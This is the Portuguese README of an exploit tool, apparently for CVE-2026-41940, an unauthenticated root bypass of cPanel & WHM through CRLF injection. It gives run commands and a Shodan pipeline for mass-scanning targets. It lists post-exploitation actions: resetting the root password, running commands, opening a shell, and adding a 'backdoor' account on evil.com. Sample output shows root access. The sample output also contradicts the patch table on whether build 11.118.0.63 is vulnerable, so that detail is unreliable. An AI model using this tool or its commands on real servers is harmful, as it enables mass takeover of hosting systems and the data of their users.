
cPanel & WHM - Bypass de Autenticação via Injeção CRLF em Arquivo de Sessão
⚡ Root Não Autenticado – Injeção CRLF em Arquivo de Sessão ⚡
“Uma cadeia para governar a todos.”
┌─────────────────────────────────────────────────────────────┐
│ Etapa 1 ── Gerar um cookie de sessão pré‑autenticação │
│ Etapa 2 ── Injeção CRLF via cabeçalho `Authorization` │
│ Etapa 3 ── Disparar `do_token_denied` (raw → cache) │
│ Etapa 4 ── Verificar acesso root do WHM via API JSON │
└─────────────────────────────────────────────────────────────┘
💥 Resultado – Acesso root completo ao WHM, sem necessidade de credenciais.
Este projeto é distribuído sob a Licença MIT – sinta-se livre para usar, modificar e distribuir, mas não seja malvado 😈.
Consulte o arquivo LICENSE para mais detalhes.
git clone https://github.com/0xgh057r3c0n/CVE-2026-41940.git && cd CVE-2026-41940
Zero dependências – apenas a biblioteca padrão do Python 3.
Você não precisa depip,virtualenvou qualquer dessas frescuras.
./CVE-2026-41940.py -u https://target.com:2087
./CVE-2026-41940.py -l targets.txt -t 20 -o results.json
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' | ./CVE-2026-41940.py -t 30
Depois de dominar a máquina, você pode:
--action list--action passwd --passwd "h4ck3d!"--action cmd --cmd "id;whoami"--action shell (terminal WHM completo)--action adduser --new-user backdoor --new-domain evil.com --passwd "pwn3d"cat /etc/passwd--action info$ ./CVE-2026-41940.py -u https://192.168.1.100:2087
Configuração:
Alvos : 1
Threads : 10
Timeout : 15s
Ação : apenas varredura
[10:23:15] [SCAN] Iniciando cadeia de exploit em 4 etapas... https://192.168.1.100:2087
[10:23:15] [INFO] Hostname canônico descoberto: server.example.com
[10:23:15] [STEP] Etapa 1/4 — Gerando sessão pré-autenticação...
[10:23:16] [ OK] Etapa1: sessão pré-autenticação = 9a7f8e3d2c1b0a9f
[10:23:16] [STEP] Etapa 2/4 — Injeção CRLF via cabeçalho Authorization...
[10:23:17] [ OK] Etapa2: HTTP 302 → token=/cpsess1234567890
[10:23:17] [STEP] Etapa 3/4 — Disparando gadget do_token_denied (raw→cache)...
[10:23:18] [ OK] Etapa3: HTTP 401 — gadget do_token_denied disparado
[10:23:18] [STEP] Etapa 4/4 — Verificando acesso root do WHM...
[10:23:18] [INFO] Etapa4: HTTP 200 {"version":"11.118.0.63",...}
[10:23:18] [PWND] CVE-2026-41940 CONFIRMADO — Acesso root do WHM! (v11.118.0.63 — CONFIRMADO vulnerável)
[10:23:18] [PWND] Token : /cpsess1234567890
[10:23:18] [PWND] Sessão : 9a7f8e3d2c1b0a9f
[10:23:18] [PWND] Versão : 11.118.0.63
[10:23:18] [PWND] URL API : https://192.168.1.100:2087/cpsess1234567890/json-api/version
CVE-2026-41940 — Varredura Concluída
Tempo: 3.2s · Alvos: 1
1 ALVO(S) VULNERÁVEL(IS)
[*] Alvo : https://192.168.1.100:2087
[*] Versão : 11.118.0.63
[*] Token : /cpsess1234567890
[*] URL API : https://192.168.1.100:2087/cpsess1234567890/json-api/version
[*] Sessão : 9a7f8e3d2c1b0a9f
[*] Evidência: {"version":"11.118.0.63",...}
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087
Todas as versões abaixo dessas builds são vulneráveis.
0xgh057r3c0n – pesquisador de segurança, engenheiro reverso e viciado em café.
GitHub | Twitter
Esta ferramenta destina-se apenas a testes de segurança autorizados e fins educacionais.
O acesso não autorizado a sistemas de computador é ilegal. O autor e os colaboradores não são responsáveis por qualquer uso indevido ou dano causado por este software.
Use com responsabilidade e sempre obtenha permissão primeiro.
🔥 Hackeie o planeta, mas permaneça legal. 🔥
| Flag | Descrição |
|---|
-u, --url | URL do alvo único (ex.: https://host:2087) |
-l, --list | Arquivo com uma URL por linha |
--hostname | Substituir o cabeçalho Host canônico (descoberto automaticamente) |
-t, --threads | Threads (padrão: 10) |
--timeout | Timeout em segundos (padrão: 15) |
--rate-limit | Pausa entre alvos (segundos) |
--action | Pós-exploração: list, passwd, cmd, exec, info, version, shell, adduser |
--passwd | Nova senha de root (com --action passwd) |
--cmd | Comando do sistema operacional (com --action cmd/exec) |
--new-user | Novo nome de usuário cPanel (com --action adduser) |
--new-domain | Novo domínio cPanel (com --action adduser) |
-o, --output | Salvar resultados em JSON |
| Branch | Build Corrigida | Status |
|---|
| 11.110 | 11.110.0.97 | 🛡️ Corrigido |
| 11.118 | 11.118.0.63 | 🛡️ Corrigido |
| 11.126 | 11.126.0.54 | 🛡️ Corrigido |
| 11.132 | 11.132.0.29 | 🛡️ Corrigido |
| 11.134 | 11.134.0.20 | 🛡️ Corrigido |
| 11.136 | 11.136.0.5 | 🛡️ Corrigido |